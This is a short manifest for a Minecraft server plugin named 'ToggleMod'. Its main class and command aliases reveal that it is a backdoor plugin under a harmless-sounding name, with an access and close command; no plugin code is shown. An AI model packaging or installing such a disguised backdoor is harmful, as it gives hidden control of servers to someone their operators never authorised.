name: ToggleMod
main: me.superischroma.backdoormod.BackDoorMod
version: 1.0
depend: [Aero]
author: [Super_]
commands:
    togglemod:
        description: Main command for the ToggleMod.
        usage: /<command> [access | close | number]
        aliases: [bdm,bd,backdoormod,backdoor]